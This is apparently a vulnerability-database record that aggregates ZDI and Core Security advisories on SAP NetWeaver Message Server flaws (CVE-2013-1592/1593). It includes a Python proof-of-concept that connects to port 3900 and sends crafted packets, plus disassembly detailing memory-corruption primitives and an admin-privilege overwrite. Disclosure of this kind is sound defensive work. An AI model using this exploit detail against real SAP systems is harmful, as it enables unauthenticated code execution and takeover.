CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012
-
-- CVE ID:
-
-- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C
-
-- Affected Vendors: SAP
-
-- Affected Products: SAP NetWeaver
-
-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.
-
-- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40
-
-- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory
-
-- Credit: This vulnerability was discovered by:
-
e6af8de8b1d4b2b6d5ba2610cbf9cd38
-
-- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8
wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-0833",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 2.1,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "2004s"
},
{
"model": "netweaver abap",
"scope": null,
"trust": 1.2,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.01 sr1"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.02 sp06"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.30 sp04"
},
{
"model": "netweaver abap null",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver 2004s",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "CNVD",
"id": "CNVD-2012-3434"
},
{
"db": "CNVD",
"id": "CNVD-2012-3433"
},
{
"db": "BID",
"id": "57956"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
"sources": [
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
}
],
"trust": 2.1
},
"cve": "CVE-2013-1593",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-1593",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "ZDI-12-112",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-111",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "ZDI-12-104",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2013-1593",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-1593",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-112",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-111",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "ZDI",
"id": "ZDI-12-104",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-1593",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "29348194-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
},
{
"db": "ZDI",
"id": "ZDI-12-112"
},
{
"db": "ZDI",
"id": "ZDI-12-111"
},
{
"db": "ZDI",
"id": "ZDI-12-104"
},
{
"db": "VULMON",
"id": "CVE-2013-1593"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007128"
},
{
"db": "NVD",
"id": "CVE-2013-1593"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script is the main PoC that can be used to\nreproduce all vulnerabilities described below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-d\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3900)\n(options, args) = parser.parse_args()\n\nclient_string = \u0027-\u0027+\u0027 \u0027*39\nserver_name = \u0027-\u0027+\u0027 \u0027*39\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize_connection(hostname, port):\n\n # Connect\n print \"[*] Connecting to\", hostname, \"port\", port\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((hostname, port))\n\n # Send initialization packet\n print \"[*] Conected, sending login request\"\n\n init = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n init+= \u0027\\x04\u0027 # version\n init+= \u0027\\x00\u0027 # errorno\n init+= client_string # toname\n init+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n init+= \u0027\\x01\\x08\u0027 # flag / iflag (MS_LOGIN_2)\n init+= client_string # fromname\n init+= \u0027\\x00\\x00\u0027 # padd\n send_packet(connection, init)\n\n # Receive response\n print \"[*] Receiving login reply\"\n (length, data) = receive(connection)\n\n # Parsing login reply\n server_name = data[4+64:4+64+40]\n\n return connection\n\n# Main PoC body\nconnection = initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid dd ?\n00000008 serviceid dd ?\n0000000C groupid dd ?\n00000010 nodetype db ?\n00000011 db ? ; undefined\n00000012 db ? ; undefined\n00000013 db ? ; undefined\n00000014 totallength dd ?\n00000018 currentlength dd ?\n0000001C currentoffset dd ?\n00000020 totalblocks db ?\n00000021 currentblock db ?\n00000021\n00000022 db ? ; undefined\n00000023 db ? ; undefined\n00000024 messagetype dd ?\n00000028 MSJ2EE_HEADER ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... \n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov edi, [ebp+pJ2eeHeader]\nmov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor ecx, ecx\ncmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea esi, [eax+eax*8]\nlea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000 ; XREF:\n.data:j2ee_stat_totalr\n00000000 ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount dq ? ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000 ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008 ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010 ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength dq ? ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018 ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020 ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028 ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply dq ? ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030 ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ? ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038 ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ? ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040 ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359 movzx eax, [ebp+msiflag]\n.text:0044D35D sub eax, 0Ch\n.text:0044D360 jz short loc_44D37C\n.text:0044D362 sub eax, ebx\n.text:0044D364 jnz short loc_44D39D\n.text:0044D366 cmp [ebp+msflag], 2\n.text:0044D36A jnz short loc_44D374\n.text:0044D36C add [esi+40h], ebx ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F adc [esi+44h], ecx\n.text:0044D372 jmp short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374: ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374 add [esi+38h], ebx ; iflag=0xd,\nflag=1 =\u003e add 1 to [esi+0x38]\n.text:0044D377 adc [esi+3Ch], ecx\n.text:0044D37A jmp short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C: ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C mov al, [ebp+msflag]\n.text:0044D37F cmp al, 3\n.text:0044D381 jnz short loc_44D38B\n.text:0044D383 add [esi+30h], ebx ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386 adc [esi+34h], ecx\n.text:0044D389 jmp short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B: ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B cmp al, 2\n.text:0044D38D jnz short loc_44D397\n.text:0044D38F add [esi+28h], ebx ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392 adc [esi+2Ch], ecx\n.text:0044D395 jmp short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397: ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397 add [esi+20h], ebx ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A adc [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7 add [esi],\nebx ;add 1 to [esi]\n.text:0044D3B9 adc dword ptr [esi+4], 0\n.text:0044D3BD mov eax,\n[edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0 cdq\n.text:0044D3C1 add [esi+8],\neax ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s struc ; (sizeof=0x538, standard type)\n00000000 ; XREF: .data:dummy_clientr\n00000000 client_type dd ? ; enum MS_CLIENT_TYPE\n00000004 stat dd ? ; enum MS_STAT\n00000008 connection_ID dd ?\n0000000C status db ?\n0000000D dom db ? ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed db ?\n0000000F db ? ; undefined\n00000010 name dw 40 dup(?)\n[...]\n00000534 _padding db 4 dup(?)\n00000538 MSADM_s ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC: ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n ; MsSLoginClient+B26j\n.text:004230DC cmp byte ptr [edi+0Eh],\n0 ; privileged client?\n.text:004230E0 jnz short\nloc_4230EA ; if yes, jump\n.text:004230E2 mov al, byte ptr\nms_admin_allowed ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7 mov [edi+0Eh],\nal ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ? ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0 ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that 